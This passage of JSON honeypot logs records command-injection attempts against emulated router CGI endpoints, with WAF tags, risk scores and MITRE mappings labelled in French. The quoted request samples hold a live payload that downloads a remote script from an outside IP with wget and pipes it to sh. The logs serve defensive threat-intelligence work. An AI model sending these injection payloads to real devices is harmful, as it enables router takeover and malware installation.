02:29:49.000000","proto":"tcp","src_port":35652,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":47,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/internet.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u00220629d7057c54a343dd0d4f93345dc6e243865841\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 327, \u0022payload_entropy\u0022: 5.16965165796522, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 82, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022bf38ea8cef8d51c26c553a16765c473947b2c4c8\u0022, \u0022event_fingerprint\u0022: \u0022326f9dfd298cf46bb6941d8359ae0258c23aed21\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022e6ced12d6f5a8b3ad4e4d3c9e90461ec\u0022, \u0022path_pattern_hash\u0022: \u002279c2d1d58dcaacc68cc00d1bea04f739\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 82}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 176\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/internet.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 176\\r\\nConnection: close\\r\\n\\r\\ngateway=192.168.1.1`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wdr2;busybox wget http:\/\/91.92.40.\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 176\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/internet.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 176\\r\\nConnection: close\\r\\n\\r\\ngateway=192.168.1.1`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wdr2;busybox wget http:\/\/91.92.40.\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 176\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u002201791753442ee7b6f42210884bf0456bd9125dc5\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/internet.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 176\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/internet.cgi\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 82, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/internet.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/internet.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 176\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":327},{"id":11809697,"ip":"45.153.34.252","ts":"2026-07-14 02:29:48.000000","proto":"tcp","src_port":35636,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":47,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/wireless.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u00225d213d21ab531035b3d11e0f269406faf9a8e9dd\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 322, \u0022payload_entropy\u0022: 5.163910702669505, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 82, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022bf38ea8cef8d51c26c553a16765c473947b2c4c8\u0022, \u0022event_fingerprint\u0022: \u00221ab51c0facfaa584683a9e7f76f0d3b02ddd2be2\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022a2f77cd84f99baacefa77874d2b8434c\u0022, \u0022path_pattern_hash\u0022: \u0022e8069dc607bc4e1a464a8f30c4269ee3\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 82}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 171\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/wireless.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 171\\r\\nConnection: close\\r\\n\\r\\nsz11gChannel=1`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wdr1;busybox wget http:\/\/91.92.40.118\/w\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 171\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/wireless.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 171\\r\\nConnection: close\\r\\n\\r\\nsz11gChannel=1`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wdr1;busybox wget http:\/\/91.92.40.118\/w\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 171\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022e0811995e53731b5f90fc023683317272c2f6fed\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/wireless.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 171\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/wireless.cgi\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 82, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/wireless.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/wireless.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 171\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: 